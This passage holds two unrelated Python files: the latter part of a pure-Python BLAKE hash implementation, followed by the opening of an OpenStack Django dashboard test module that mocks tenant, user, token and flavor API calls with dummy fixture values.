0x3C6EF372, 0xA54FF53A,
0x510E527F, 0x9B05688C,
0x1F83D9AB, 0x5BE0CD19,
]
# note: the values here are the same as the low-order
# half-words of IV48
IV28 = [
0xC1059ED8, 0x367CD507,
0x3070DD17, 0xF70E5939,
0xFFC00B31, 0x68581511,
0x64F98FA7, 0xBEFA4FA4,
]
# constants for BLAKE-64 and BLAKE-48
C64 = [
0x243F6A8885A308D3, 0x13198A2E03707344,
0xA4093822299F31D0, 0x082EFA98EC4E6C89,
0x452821E638D01377, 0xBE5466CF34E90C6C,
0xC0AC29B7C97C50DD, 0x3F84D5B5B5470917,
0x9216D5D98979FB1B, 0xD1310BA698DFB5AC,
0x2FFD72DBD01ADFB7, 0xB8E1AFED6A267E96,
0xBA7C9045F12C7F99, 0x24A19947B3916CF7,
0x0801F2E2858EFC16, 0x636920D871574E69,
]
# constants for BLAKE-32 and BLAKE-28
# note: concatenate and the values are the same as the values
# for the 1st half of C64
C32 = [
0x243F6A88, 0x85A308D3,
0x13198A2E, 0x03707344,
0xA4093822, 0x299F31D0,
0x082EFA98, 0xEC4E6C89,
0x452821E6, 0x38D01377,
0xBE5466CF, 0x34E90C6C,
0xC0AC29B7, 0xC97C50DD,
0x3F84D5B5, 0xB5470917,
]
# the 10 permutations of:0,...15}
SIGMA = [
[ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9,10,11,12,13,14,15],
[14,10, 4, 8, 9,15,13, 6, 1,12, 0, 2,11, 7, 5, 3],
[11, 8,12, 0, 5, 2,15,13,10,14, 3, 6, 7, 1, 9, 4],
[ 7, 9, 3, 1,13,12,11,14, 2, 6, 5,10, 4, 0,15, 8],
[ 9, 0, 5, 7, 2, 4,10,15,14, 1,11,12, 6, 8, 3,13],
[ 2,12, 6,10, 0,11, 8, 3, 4,13, 7, 5,15,14, 1, 9],
[12, 5, 1,15,14,13, 4,10, 0, 7, 6, 3, 9, 2, 8,11],
[13,11, 7,14,12, 1, 3, 9, 5, 0,15, 4, 8, 6, 2,10],
[ 6,15,14, 9,11, 3, 0, 8,12, 2,13, 7, 1, 4,10, 5],
[10, 2, 8, 4, 7, 6, 1, 5,15,11, 9,14, 3,12,13, 0],
[ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9,10,11,12,13,14,15],
[14,10, 4, 8, 9,15,13, 6, 1,12, 0, 2,11, 7, 5, 3],
[11, 8,12, 0, 5, 2,15,13,10,14, 3, 6, 7, 1, 9, 4],
[ 7, 9, 3, 1,13,12,11,14, 2, 6, 5,10, 4, 0,15, 8],
[ 9, 0, 5, 7, 2, 4,10,15,14, 1,11,12, 6, 8, 3,13],
[ 2,12, 6,10, 0,11, 8, 3, 4,13, 7, 5,15,14, 1, 9],
[12, 5, 1,15,14,13, 4,10, 0, 7, 6, 3, 9, 2, 8,11],
[13,11, 7,14,12, 1, 3, 9, 5, 0,15, 4, 8, 6, 2,10],
[ 6,15,14, 9,11, 3, 0, 8,12, 2,13, 7, 1, 4,10, 5],
[10, 2, 8, 4, 7, 6, 1, 5,15,11, 9,14, 3,12,13, 0],
]
MASK32BITS = 0xFFFFFFFF
MASK64BITS = 0xFFFFFFFFFFFFFFFF
# - - - - - - - - - - - - - - - - - - - - - - - - - - -
def __init__(self, hashbitlen):
"""
load the hashSate structure (copy hashbitlen...)
hashbitlen: length of the hash output
"""
if hashbitlen not in [224, 256, 384, 512]:
raise Exception('hash length not 224, 256, 384 or 512')
self.hashbitlen = hashbitlen
self.h = [0]*8 # current chain value (initialized to the IV)
self.t = 0 # number of *BITS* hashed so far
self.cache = b'' # cached leftover data not yet compressed
self.salt = [0]*4 # salt (null by default)
self.state = 1 # set to 2 by update and 3 by final
self.nullt = 0 # Boolean value for special case \ell_i=0
# The algorithm is the same for both the 32- and 64- versions
# of BLAKE. The difference is in word size (4 vs 8 bytes),
# blocksize (64 vs 128 bytes), number of rounds (14 vs 16)
# and a few very specific constants.
if (hashbitlen == 224) or (hashbitlen == 256):
# setup for 32-bit words and 64-bit block
self.byte2int = self._fourByte2int
self.int2byte = self._int2fourByte
self.MASK = self.MASK32BITS
self.WORDBYTES = 4
self.WORDBITS = 32
self.BLKBYTES = 64
self.BLKBITS = 512
self.ROUNDS = 14 # was 10 before round 3
self.cxx = self.C32
self.rot1 = 16 # num bits to shift in G
self.rot2 = 12 # num bits to shift in G
self.rot3 = 8 # num bits to shift in G
self.rot4 = 7 # num bits to shift in G
self.mul = 0 # for 32-bit words, 32<<self.mul where self.mul = 0
# 224- and 256-bit versions (32-bit words)
if hashbitlen == 224:
self.h = self.IV28[:]
else:
self.h = self.IV32[:]
elif (hashbitlen == 384) or (hashbitlen == 512):
# setup for 64-bit words and 128-bit block
self.byte2int = self._eightByte2int
self.int2byte = self._int2eightByte
self.MASK = self.MASK64BITS
self.WORDBYTES = 8
self.WORDBITS = 64
self.BLKBYTES = 128
self.BLKBITS = 1024
self.ROUNDS = 16 # was 14 before round 3
self.cxx = self.C64
self.rot1 = 32 # num bits to shift in G
self.rot2 = 25 # num bits to shift in G
self.rot3 = 16 # num bits to shift in G
self.rot4 = 11 # num bits to shift in G
self.mul = 1 # for 64-bit words, 32<<self.mul where self.mul = 1
# 384- and 512-bit versions (64-bit words)
if hashbitlen == 384:
self.h = self.IV48[:]
else:
self.h = self.IV64[:]
# - - - - - - - - - - - - - - - - - - - - - - - - - - -
def _compress(self, block):
byte2int = self.byte2int
mul = self.mul # de-reference these for ...speed? ;-)
cxx = self.cxx
rot1 = self.rot1
rot2 = self.rot2
rot3 = self.rot3
rot4 = self.rot4
MASK = self.MASK
WORDBITS = self.WORDBITS
SIGMA = self.SIGMA
# get message (<<2 is the same as *4 but faster)
m = [byte2int(block[i<<2<<mul:(i<<2<<mul)+(4<<mul)]) for i in range(16)]
# initialization
v = [0]*16
v[ 0: 8] = [self.h[i] for i in range(8)]
v[ 8:16] = [self.cxx[i] for i in range(8)]
v[ 8:12] = [v[8+i] ^ self.salt[i] for i in range(4)]
if self.nullt == 0: # (i>>1 is the same as i/2 but faster)
v[12] = v[12] ^ (self.t & MASK)
v[13] = v[13] ^ (self.t & MASK)
v[14] = v[14] ^ (self.t >> self.WORDBITS)
v[15] = v[15] ^ (self.t >> self.WORDBITS)
# - - - - - - - - - - - - - - - - -
# ready? let's ChaCha!!!
def G(a, b, c, d, i):
va = v[a] # it's faster to deref and reref later
vb = v[b]
vc = v[c]
vd = v[d]
sri = SIGMA[round][i]
sri1 = SIGMA[round][i+1]
va = ((va + vb) + (m[sri] ^ cxx[sri1]) ) & MASK
x = vd ^ va
vd = (x >> rot1) | ((x << (WORDBITS-rot1)) & MASK)
vc = (vc + vd) & MASK
x = vb ^ vc
vb = (x >> rot2) | ((x << (WORDBITS-rot2)) & MASK)
va = ((va + vb) + (m[sri1] ^ cxx[sri]) ) & MASK
x = vd ^ va
vd = (x >> rot3) | ((x << (WORDBITS-rot3)) & MASK)
vc = (vc + vd) & MASK
x = vb ^ vc
vb = (x >> rot4) | ((x << (WORDBITS-rot4)) & MASK)
v[a] = va
v[b] = vb
v[c] = vc
v[d] = vd
for round in range(self.ROUNDS):
# column step
G( 0, 4, 8,12, 0)
G( 1, 5, 9,13, 2)
G( 2, 6,10,14, 4)
G( 3, 7,11,15, 6)
# diagonal step
G( 0, 5,10,15, 8)
G( 1, 6,11,12,10)
G( 2, 7, 8,13,12)
G( 3, 4, 9,14,14)
# - - - - - - - - - - - - - - - - -
# save current hash value (use i&0x3 to get 0,1,2,3,0,1,2,3)
self.h = [self.h[i]^v[i]^v[i+8]^self.salt[i&0x3]
for i in range(8)]
# print 'self.h', [num2hex(h) for h in self.h]
# - - - - - - - - - - - - - - - - - - - - - - - - - - -
def addsalt(self, salt):
""" adds a salt to the hash function (OPTIONAL)
should be called AFTER Init, and BEFORE update
salt: a bytestring, length determined by hashbitlen.
if not of sufficient length, the bytestring
will be assumed to be a big endian number and
prefixed with an appropriate number of null
bytes, and if too large, only the low order
bytes will be used.
if hashbitlen=224 or 256, then salt will be 16 bytes
if hashbitlen=384 or 512, then salt will be 32 bytes
"""
# fail if addsalt() was not called at the right time
if self.state != 1:
raise Exception('addsalt() not called after init() and before update()')
# salt size is to be 4x word size
saltsize = self.WORDBYTES * 4
# if too short, prefix with null bytes. if too long,
# truncate high order bytes
if len(salt) < saltsize:
salt = (chr(0)*(saltsize-len(salt)) + salt)
else:
salt = salt[-saltsize:]
# prep the salt array
self.salt[0] = self.byte2int(salt[ : 4<<self.mul])
self.salt[1] = self.byte2int(salt[ 4<<self.mul: 8<<self.mul])
self.salt[2] = self.byte2int(salt[ 8<<self.mul:12<<self.mul])
self.salt[3] = self.byte2int(salt[12<<self.mul: ])
# - - - - - - - - - - - - - - - - - - - - - - - - - - -
def update(self, data):
""" update the state with new data, storing excess data
as necessary. may be called multiple times and if a
call sends less than a full block in size, the leftover
is cached and will be consumed in the next call
data: data to be hashed (bytestring)
"""
self.state = 2
BLKBYTES = self.BLKBYTES # de-referenced for improved readability
BLKBITS = self.BLKBITS
datalen = len(data)
if not datalen: return
if type(data) == type(u''):
# use either of the next two lines for a proper
# response under both Python2 and Python3
data = data.encode('UTF-8') # converts to byte string
#data = bytearray(data, 'utf-8') # use if want mutable
# This next line works for Py3 but fails under
# Py2 because the Py2 version of bytes() will
# accept only *one* argument. Arrrrgh!!!
#data = bytes(data, 'utf-8') # converts to immutable byte
# string but... under p7
# bytes() wants only 1 arg
# ...a dummy, 2nd argument like encoding=None
# that does nothing would at least allow
# compatibility between Python2 and Python3.
left = len(self.cache)
fill = BLKBYTES - left
# if any cached data and any added new data will fill a
# full block, fill and compress
if left and datalen >= fill:
self.cache = self.cache + data[:fill]
self.t += BLKBITS # update counter
self._compress(self.cache)
self.cache = b''
data = data[fill:]
datalen -= fill
# compress new data until not enough for a full block
while datalen >= BLKBYTES:
self.t += BLKBITS # update counter
self._compress(data[:BLKBYTES])
data = data[BLKBYTES:]
datalen -= BLKBYTES
# cache all leftover bytes until next call to update()
if datalen > 0:
self.cache = self.cache + data[:datalen]
# - - - - - - - - - - - - - - - - - - - - - - - - - - -
def final(self, data=''):
""" finalize the hash -- pad and hash remaining data
returns hashval, the digest
"""
if self.state == 3:
# we have already finalized so simply return the
# previously calculated/stored hash value
return self.hash
if data:
self.update(data)
ZZ = b'\x00'
ZO = b'\x01'
OZ = b'\x80'
OO = b'\x81'
PADDING = OZ + ZZ*128 # pre-formatted padding data
# copy nb. bits hash in total as a 64-bit BE word
# copy nb. bits hash in total as a 128-bit BE word
tt = self.t + (len(self.cache) << 3)
if self.BLKBYTES == 64:
msglen = self._int2eightByte(tt)
else:
low = tt & self.MASK
high = tt >> self.WORDBITS
msglen = self._int2eightByte(high) + self._int2eightByte(low)
# size of block without the words at the end that count
# the number of bits, 55 or 111.
# Note: (((self.WORDBITS/8)*2)+1) equals ((self.WORDBITS>>2)+1)
sizewithout = self.BLKBYTES - ((self.WORDBITS>>2)+1)
if len(self.cache) == sizewithout:
# special case of one padding byte
self.t -= 8
if self.hashbitlen in [224, 384]:
self.update(OZ)
else:
self.update(OO)
else:
if len(self.cache) < sizewithout:
# enough space to fill the block
# use t=0 if no remaining data
if len(self.cache) == 0:
self.nullt=1
self.t -= (sizewithout - len(self.cache)) << 3
self.update(PADDING[:sizewithout - len(self.cache)])
else:
# NOT enough space, need 2 compressions
# ...add marker, pad with nulls and compress
self.t -= (self.BLKBYTES - len(self.cache)) << 3
self.update(PADDING[:self.BLKBYTES - len(self.cache)])
# ...now pad w/nulls leaving space for marker & bit count
self.t -= (sizewithout+1) << 3
self.update(PADDING[1:sizewithout+1]) # pad with zeroes
self.nullt = 1 # raise flag to set t=0 at the next _compress
# append a marker byte
if self.hashbitlen in [224, 384]:
self.update(ZZ)
else:
self.update(ZO)
self.t -= 8
# append the number of bits (long long)
self.t -= self.BLKBYTES
self.update(msglen)
hashval = []
if self.BLKBYTES == 64:
for h in self.h:
hashval.append(self._int2fourByte(h))
else:
for h in self.h:
hashval.append(self._int2eightByte(h))
self.hash = b''.join(hashval)[:self.hashbitlen >> 3]
self.state = 3
return self.hash
digest = final # may use digest() as a synonym for final()
# - - - - - - - - - - - - - - - - - - - - - - - - - - -
def hexdigest(self, data=''):
return hexlify(self.final(data)).decode('UTF-8')
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# utility functions
def _fourByte2int(self, bytestr): # see also long2byt() below
""" convert a 4-byte string to an int (long) """
return struct.unpack('!L', bytestr)[0]
def _eightByte2int(self, bytestr):
""" convert a 8-byte string to an int (long long) """
return struct.unpack('!Q', bytestr)[0]
def _int2fourByte(self, x): # see also long2byt() below
""" convert a number to a 4-byte string, high order
truncation possible (in Python x could be a BIGNUM)
"""
return struct.pack('!L', x)
def _int2eightByte(self, x):
""" convert a number to a 8-byte string, high order
truncation possible (in Python x could be a BIGNUM)
"""
return struct.pack('!Q', x)
#---------------------------------------------------------------
#---------------------------------------------------------------
#---------------------------------------------------------------
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2011 Fourth Paradigm Development, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import cloudfiles
import httplib
import json
import mox
from django import http
from django.conf import settings
from django_openstack import api
from glance import client as glance_client
from mox import IsA
from openstack import compute as OSCompute
from openstackx import admin as OSAdmin
from openstackx import auth as OSAuth
from openstackx import extras as OSExtras
from django_openstack import test
from django_openstack.middleware import keystone
TEST_CONSOLE_KIND = 'vnc'
TEST_EMAIL = 'test@test.com'
TEST_HOSTNAME = 'hostname'
TEST_INSTANCE_ID = '2'
TEST_PASSWORD = '12345'
TEST_PORT = 8000
TEST_RETURN = 'retValue'
TEST_TENANT_DESCRIPTION = 'tenantDescription'
TEST_TENANT_ID = '1234'
TEST_TOKEN = 'aToken'
TEST_TOKEN_ID = 'userId'
TEST_URL = 'http://%s:%s/something/v1.0' % (TEST_HOSTNAME, TEST_PORT)
TEST_USERNAME = 'testUser'
class Server(object):
""" More or less fakes what the api is looking for """
def __init__(self, id, imageRef, attrs=None):
self.id = id
self.imageRef = imageRef
if attrs is not None:
self.attrs = attrs
def __eq__(self, other):
if self.id != other.id or \
self.imageRef != other.imageRef:
return False
for k in self.attrs:
if other.attrs.__getattr__(k) != v:
return False
return True
def __ne__(self, other):
return not self == other
class Tenant(object):
""" More or less fakes what the api is looking for """
def __init__(self, id, description, enabled):
self.id = id
self.description = description
self.enabled = enabled
def __eq__(self, other):
return self.id == other.id and \
self.description == other.description and \
self.enabled == other.enabled
def __ne__(self, other):
return not self == other
class Token(object):
""" More or less fakes what the api is looking for """
def __init__(self, id, username, tenant_id, serviceCatalog=None):
self.id = id
self.username = username
self.tenant_id = tenant_id
self.serviceCatalog = serviceCatalog
def __eq__(self, other):
return self.id == other.id and \
self.username == other.username and \
self.tenant_id == other.tenant_id and \
self.serviceCatalog == other.serviceCatalog
def __ne__(self, other):
return not self == other
class APIResource(api.APIResourceWrapper):
""" Simple APIResource for testing """
_attrs = ['foo', 'bar', 'baz']
@staticmethod
def get_instance(innerObject=None):
if innerObject is None:
class InnerAPIResource(object):
pass
innerObject = InnerAPIResource()
innerObject.foo = 'foo'
innerObject.bar = 'bar'
return APIResource(innerObject)
class APIDict(api.APIDictWrapper):
""" Simple APIDict for testing """
_attrs = ['foo', 'bar', 'baz']
@staticmethod
def get_instance(innerDict=None):
if innerDict is None:
innerDict = {'foo': 'foo',
'bar': 'bar'}
return APIDict(innerDict)
class APIResourceWrapperTests(test.TestCase):
def test_get_attribute(self):
resource = APIResource.get_instance()
self.assertEqual(resource.foo, 'foo')
def test_get_invalid_attribute(self):
resource = APIResource.get_instance()
self.assertNotIn('missing', resource._attrs,
msg="Test assumption broken. Find new missing attribute")
with self.assertRaises(AttributeError):
resource.missing
def test_get_inner_missing_attribute(self):
resource = APIResource.get_instance()
with self.assertRaises(AttributeError):
resource.baz
class APIDictWrapperTests(test.TestCase):
# APIDict allows for both attribute access and dictionary style [element]
# style access. Test both
def test_get_item(self):
resource = APIDict.get_instance()
self.assertEqual(resource.foo, 'foo')
self.assertEqual(resource['foo'], 'foo')
def test_get_invalid_item(self):
resource = APIDict.get_instance()
self.assertNotIn('missing', resource._attrs,
msg="Test assumption broken. Find new missing attribute")
with self.assertRaises(AttributeError):
resource.missing
with self.assertRaises(KeyError):
resource['missing']
def test_get_inner_missing_attribute(self):
resource = APIDict.get_instance()
with self.assertRaises(AttributeError):
resource.baz
with self.assertRaises(KeyError):
resource['baz']
def test_get_with_default(self):
resource = APIDict.get_instance()
self.assertEqual(resource.get('foo'), 'foo')
self.assertIsNone(resource.get('baz'))
self.assertEqual('retValue', resource.get('baz', 'retValue'))
# Wrapper classes that only define _attrs don't need extra testing.
# Wrapper classes that have other attributes or methods need testing
class ImageWrapperTests(test.TestCase):
dict_with_properties = {
'properties':
{'image_state': 'running'},
'size': 100,
}
dict_without_properties = {
'size': 100,
}
def test_get_properties(self):
image = api.Image(self.dict_with_properties)
image_props = image.properties
self.assertIsInstance(image_props, api.ImageProperties)
self.assertEqual(image_props.image_state, 'running')
def test_get_other(self):
image = api.Image(self.dict_with_properties)
self.assertEqual(image.size, 100)
def test_get_properties_missing(self):
image = api.Image(self.dict_without_properties)
with self.assertRaises(AttributeError):
image.properties
def test_get_other_missing(self):
image = api.Image(self.dict_without_properties)
with self.assertRaises(AttributeError):
self.assertNotIn('missing', image._attrs,
msg="Test assumption broken. Find new missing attribute")
image.missing
class ServerWrapperTests(test.TestCase):
HOST = 'hostname'
ID = '1'
IMAGE_NAME = 'imageName'
IMAGE_REF = '3'
def setUp(self):
super(ServerWrapperTests, self).setUp()
# these are all objects "fetched" from the api
self.inner_attrs = {'host': self.HOST}
self.inner_server = Server(self.ID, self.IMAGE_REF, self.inner_attrs)
self.inner_server_no_attrs = Server(self.ID, self.IMAGE_REF)
#self.request = self.mox.CreateMock(http.HttpRequest)
def test_get_attrs(self):
server = api.Server(self.inner_server, self.request)
attrs = server.attrs
# for every attribute in the "inner" object passed to the api wrapper,
# see if it can be accessed through the api.ServerAttribute instance
for k in self.inner_attrs:
self.assertEqual(attrs.__getattr__(k), self.inner_attrs[k])
def test_get_other(self):
server = api.Server(self.inner_server, self.request)
self.assertEqual(server.id, self.ID)
def test_get_attrs_missing(self):
server = api.Server(self.inner_server_no_attrs, self.request)
with self.assertRaises(AttributeError):
server.attrs
def test_get_other_missing(self):
server = api.Server(self.inner_server, self.request)
with self.assertRaises(AttributeError):
self.assertNotIn('missing', server._attrs,
msg="Test assumption broken. Find new missing attribute")
server.missing
def test_image_name(self):
self.mox.StubOutWithMock(api, 'image_get')
api.image_get(IsA(http.HttpRequest),
self.IMAGE_REF
).AndReturn(api.Image({'name': self.IMAGE_NAME}))
server = api.Server(self.inner_server, self.request)
self.mox.ReplayAll()
image_name = server.image_name
self.assertEqual(image_name, self.IMAGE_NAME)
self.mox.VerifyAll()
class ApiHelperTests(test.TestCase):
""" Tests for functions that don't use one of the api objects """
def test_url_for(self):
GLANCE_URL = 'http://glance/glanceapi/'
NOVA_URL = 'http://nova/novapi/'
# NOTE: serviceCatalog is now constructed as part of the user object
# serviceCatalog = {
# 'glance': [{'adminURL': GLANCE_URL + 'admin',
# 'internalURL': GLANCE_URL + 'internal'},
# ],
# 'nova': [{'adminURL': NOVA_URL + 'admin',
# 'internalURL': NOVA_URL + 'internal'},
# ],
# }
url = api.url_for(self.request, 'glance')
self.assertEqual(url, GLANCE_URL + 'internal')
url = api.url_for(self.request, 'glance', admin=False)
self.assertEqual(url, GLANCE_URL + 'internal')
url = api.url_for(self.request, 'glance', admin=True)
self.assertEqual(url, GLANCE_URL + 'admin')
url = api.url_for(self.request, 'nova')
self.assertEqual(url, NOVA_URL + 'internal')
url = api.url_for(self.request, 'nova', admin=False)
self.assertEqual(url, NOVA_URL + 'internal')
url = api.url_for(self.request, 'nova', admin=True)
self.assertEqual(url, NOVA_URL + 'admin')
def test_token_info(self):
""" This function uses the keystone api, but not through an
api client, because there doesn't appear to be one for
keystone
"""
GLANCE_URL = 'http://glance/glance_api/'
KEYSTONE_HOST = 'keystonehost'
KEYSTONE_PORT = 8080
KEYSTONE_URL = 'http://%s:%d/keystone/' % (KEYSTONE_HOST,
KEYSTONE_PORT)
serviceCatalog = {
'glance': [{'adminURL': GLANCE_URL + 'admin',
'internalURL': GLANCE_URL + 'internal'},
],
'identity': [{'adminURL': KEYSTONE_URL + 'admin',
'internalURL': KEYSTONE_URL + 'internal'},
],
}
token = Token(TEST_TOKEN_ID, TEST_TENANT_ID,
TEST_USERNAME, serviceCatalog)
jsonData = {
'auth': {
'token': {
'expires': '2011-07-02T02:01:19.382655',
'id': '3c5748d5-bec6-4215-843a-f959d589f4b0',
},
'user': {
'username': 'joeuser',
'roleRefs': [{'roleId': 'Minion'}],
'tenantId': u'1234'
}
}
}
jsonDataAdmin = {
'auth': {
'token': {
'expires': '2011-07-02T02:01:19.382655',
'id': '3c5748d5-bec6-4215-843a-f959d589f4b0',
},
'user': {
'username': 'joeuser',
'roleRefs': [{'roleId': 'Admin'}],
'tenantId': u'1234'
}
}
}
# setup test where user is not admin
self.mox.StubOutClassWithMocks(httplib, 'HTTPConnection')
conn = httplib.HTTPConnection(KEYSTONE_HOST, KEYSTONE_PORT)
response = self.mox.CreateMock(httplib.HTTPResponse)
conn.request(IsA(str), IsA(str), headers=IsA(dict))
conn.getresponse().AndReturn(response)
response.read().AndReturn(json.dumps(jsonData))
expected_nonadmin_val = {
'tenant': '1234',
'user': 'joeuser',
'admin': False
}
# setup test where user is admin
conn = httplib.HTTPConnection(KEYSTONE_HOST, KEYSTONE_PORT)
response = self.mox.CreateMock(httplib.HTTPResponse)
conn.request(IsA(str), IsA(str), headers=IsA(dict))
conn.getresponse().AndReturn(response)
response.read().AndReturn(json.dumps(jsonDataAdmin))
expected_admin_val = {
'tenant': '1234',
'user': 'joeuser',
'admin': True
}
self.mox.ReplayAll()
ret_val = api.token_info(None, token)
self.assertDictEqual(ret_val, expected_nonadmin_val)
ret_val = api.token_info(None, token)
self.assertDictEqual(ret_val, expected_admin_val)
self.mox.VerifyAll()
class AccountApiTests(test.TestCase):
def stub_account_api(self):
self.mox.StubOutWithMock(api, 'account_api')
account_api = self.mox.CreateMock(OSExtras.Account)
api.account_api(IsA(http.HttpRequest)).AndReturn(account_api)
return account_api
def test_get_account_api(self):
self.mox.StubOutClassWithMocks(OSExtras, 'Account')
OSExtras.Account(auth_token=TEST_TOKEN, management_url=TEST_URL)
self.mox.StubOutWithMock(api, 'url_for')
api.url_for(
IsA(http.HttpRequest), 'identity', True).AndReturn(TEST_URL)
api.url_for(
IsA(http.HttpRequest), 'identity', True).AndReturn(TEST_URL)
self.mox.ReplayAll()
self.assertIsNotNone(api.account_api(self.request))
self.mox.VerifyAll()
def test_tenant_create(self):
DESCRIPTION = 'aDescription'
ENABLED = True
account_api = self.stub_account_api()
account_api.tenants = self.mox.CreateMockAnything()
account_api.tenants.create(TEST_TENANT_ID, DESCRIPTION,
ENABLED).AndReturn(TEST_RETURN)
self.mox.ReplayAll()
ret_val = api.tenant_create(self.request, TEST_TENANT_ID,
DESCRIPTION, ENABLED)
self.assertIsInstance(ret_val, api.Tenant)
self.assertEqual(ret_val._apiresource, TEST_RETURN)
self.mox.VerifyAll()
def test_tenant_get(self):
account_api = self.stub_account_api()
account_api.tenants = self.mox.CreateMockAnything()
account_api.tenants.get(TEST_TENANT_ID).AndReturn(TEST_RETURN)
self.mox.ReplayAll()
ret_val = api.tenant_get(self.request, TEST_TENANT_ID)
self.assertIsInstance(ret_val, api.Tenant)
self.assertEqual(ret_val._apiresource, TEST_RETURN)
self.mox.VerifyAll()
def test_tenant_list(self):
tenants = (TEST_RETURN, TEST_RETURN + '2')
account_api = self.stub_account_api()
account_api.tenants = self.mox.CreateMockAnything()
account_api.tenants.list().AndReturn(tenants)
self.mox.ReplayAll()
ret_val = api.tenant_list(self.request)
self.assertEqual(len(ret_val), len(tenants))
for tenant in ret_val:
self.assertIsInstance(tenant, api.Tenant)
self.assertIn(tenant._apiresource, tenants)
self.mox.VerifyAll()
def test_tenant_update(self):
DESCRIPTION = 'aDescription'
ENABLED = True
account_api = self.stub_account_api()
account_api.tenants = self.mox.CreateMockAnything()
account_api.tenants.update(TEST_TENANT_ID, DESCRIPTION,
ENABLED).AndReturn(TEST_RETURN)
self.mox.ReplayAll()
ret_val = api.tenant_update(self.request, TEST_TENANT_ID,
DESCRIPTION, ENABLED)
self.assertIsInstance(ret_val, api.Tenant)
self.assertEqual(ret_val._apiresource, TEST_RETURN)
self.mox.VerifyAll()
def test_user_create(self):
account_api = self.stub_account_api()
account_api.users = self.mox.CreateMockAnything()
account_api.users.create(TEST_USERNAME, TEST_EMAIL, TEST_PASSWORD,
TEST_TENANT_ID, True).AndReturn(TEST_RETURN)
self.mox.ReplayAll()
ret_val = api.user_create(self.request, TEST_USERNAME, TEST_EMAIL,
TEST_PASSWORD, TEST_TENANT_ID, True)
self.assertIsInstance(ret_val, api.User)
self.assertEqual(ret_val._apiresource, TEST_RETURN)
self.mox.VerifyAll()
def test_user_delete(self):
account_api = self.stub_account_api()
account_api.users = self.mox.CreateMockAnything()
account_api.users.delete(TEST_USERNAME).AndReturn(TEST_RETURN)
self.mox.ReplayAll()
ret_val = api.user_delete(self.request, TEST_USERNAME)
self.assertIsNone(ret_val)
self.mox.VerifyAll()
def test_user_get(self):
account_api = self.stub_account_api()
account_api.users = self.mox.CreateMockAnything()
account_api.users.get(TEST_USERNAME).AndReturn(TEST_RETURN)
self.mox.ReplayAll()
ret_val = api.user_get(self.request, TEST_USERNAME)
self.assertIsInstance(ret_val, api.User)
self.assertEqual(ret_val._apiresource, TEST_RETURN)
self.mox.VerifyAll()
def test_user_list(self):
users = (TEST_USERNAME, TEST_USERNAME + '2')
account_api = self.stub_account_api()
account_api.users = self.mox.CreateMockAnything()
account_api.users.list().AndReturn(users)
self.mox.ReplayAll()
ret_val = api.user_list(self.request)
self.assertEqual(len(ret_val), len(users))
for user in ret_val:
self.assertIsInstance(user, api.User)
self.assertIn(user._apiresource, users)
self.mox.VerifyAll()
def test_user_update_email(self):
account_api = self.stub_account_api()
account_api.users = self.mox.CreateMockAnything()
account_api.users.update_email(TEST_USERNAME,
TEST_EMAIL).AndReturn(TEST_RETURN)
self.mox.ReplayAll()
ret_val = api.user_update_email(self.request, TEST_USERNAME,
TEST_EMAIL)
self.assertIsInstance(ret_val, api.User)
self.assertEqual(ret_val._apiresource, TEST_RETURN)
self.mox.VerifyAll()
def test_user_update_password(self):
account_api = self.stub_account_api()
account_api.users = self.mox.CreateMockAnything()
account_api.users.update_password(TEST_USERNAME,
TEST_PASSWORD).AndReturn(TEST_RETURN)
self.mox.ReplayAll()
ret_val = api.user_update_password(self.request, TEST_USERNAME,
TEST_PASSWORD)
self.assertIsInstance(ret_val, api.User)
self.assertEqual(ret_val._apiresource, TEST_RETURN)
self.mox.VerifyAll()
def test_user_update_tenant(self):
account_api = self.stub_account_api()
account_api.users = self.mox.CreateMockAnything()
account_api.users.update_tenant(TEST_USERNAME,
TEST_TENANT_ID).AndReturn(TEST_RETURN)
self.mox.ReplayAll()
ret_val = api.user_update_tenant(self.request, TEST_USERNAME,
TEST_TENANT_ID)
self.assertIsInstance(ret_val, api.User)
self.assertEqual(ret_val._apiresource, TEST_RETURN)
self.mox.VerifyAll()
class AdminApiTests(test.TestCase):
def stub_admin_api(self, count=1):
self.mox.StubOutWithMock(api, 'admin_api')
admin_api = self.mox.CreateMock(OSAdmin.Admin)
for i in range(count):
api.admin_api(IsA(http.HttpRequest)).AndReturn(admin_api)
return admin_api
def test_get_admin_api(self):
self.mox.StubOutClassWithMocks(OSAdmin, 'Admin')
OSAdmin.Admin(auth_token=TEST_TOKEN, management_url=TEST_URL)
self.mox.StubOutWithMock(api, 'url_for')
api.url_for(IsA(http.HttpRequest), 'nova', True).AndReturn(TEST_URL)
api.url_for(IsA(http.HttpRequest), 'nova', True).AndReturn(TEST_URL)
self.mox.ReplayAll()
self.assertIsNotNone(api.admin_api(self.request))
self.mox.VerifyAll()
def test_flavor_create(self):
FLAVOR_DISK = 1000
FLAVOR_ID = 6
FLAVOR_MEMORY = 1024
FLAVOR_NAME = 'newFlavor'
FLAVOR_VCPU = 2
admin_api = self.stub_admin_api()
admin_api.flavors = self.mox.CreateMockAnything()
admin_api.flavors.create(FLAVOR_NAME, FLAVOR_MEMORY, FLAVOR_VCPU,
FLAVOR_DISK, FLAVOR_ID).AndReturn(TEST_RETURN)
self.mox.ReplayAll()
ret_val = api.flavor_create(self.request, FLAVOR_NAME,
str(FLAVOR_MEMORY), str(FLAVOR_VCPU),
str(FLAVOR_DISK), FLAVOR_ID)
self.assertIsInstance(ret_val, api.Flavor)
self.assertEqual(ret_val._apiresource, TEST_RETURN)
self.mox.VerifyAll()
def test_flavor_delete(self):
FLAVOR_ID = 6
admin_api = self.stub_admin_api(count=2)
admin_api.flavors = self.mox.CreateMockAnything()
admin_api.flavors.delete(FLAVOR_ID, False).AndReturn(TEST_RETURN)
admin_api.flavors.delete(FLAVOR_ID, True).AndReturn(TEST_RETURN)
self.mox.ReplayAll()
ret_val = api.flavor_delete(self.request, FLAVOR_ID)
self.assertIsNone(ret_val)
